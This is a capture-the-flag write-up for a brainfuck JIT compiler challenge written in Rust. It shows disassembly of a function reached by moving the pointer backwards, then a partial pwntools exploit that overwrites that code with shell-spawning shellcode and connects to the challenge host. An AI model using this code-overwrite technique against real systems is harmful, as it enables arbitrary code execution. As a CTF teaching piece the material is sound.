Tags: pwn brainfuck 

Rating: 5.0

You are prompted with a Just In Time compiler written in Rust and executing brainfuck code.

A teamate found out by moving the pointer in left or "**<**" you can find a funtion which looked like this:
sub rsp, 0x28
mov qword [rsp + 0x30], rcx
mov qword [rsp + 0x40], r8
mov qword [rsp + 0x48], r9
sub rsi, 0x68
cmp rsi, rdx
jae 0x38
add rsi, 0x8000
mov qword [rsp + 0x30], rdi
mov qword [rsp + 0x38], rsi
mov qword [rsp + 0x40], rdx
mov qword [rsp + 0x48], rcx
movabs rax, 0x56321e001b50
call rax
mov rdi, qword [rsp + 0x30]
mov rsi, qword [rsp + 0x38]
mov rdx, qword [rsp + 0x40]
mov rcx, qword [rsp + 0x48]
cmp al, 0
jne 0x80
mov rax, 0
add rsp, 0x28
mov rax, 1
add rsp, 0x28

The function can be rewritten with some shellcode by reading it with "**,**" which is the equivalent of getchar() in C.
I do not overwrite the call because the shellcode will not be executed.

Full Expoit:

from pwn import *
from pwnlib import shellcraft

p = remote("challenges.tamuctf.com", 31337)
context.bits = 64
context.arch = "amd64"

shellcode = asm(shellcraft.amd64.linux.sh())

pay = b"<"*23
for _ in range(len(shellcode)):
pay += b",>"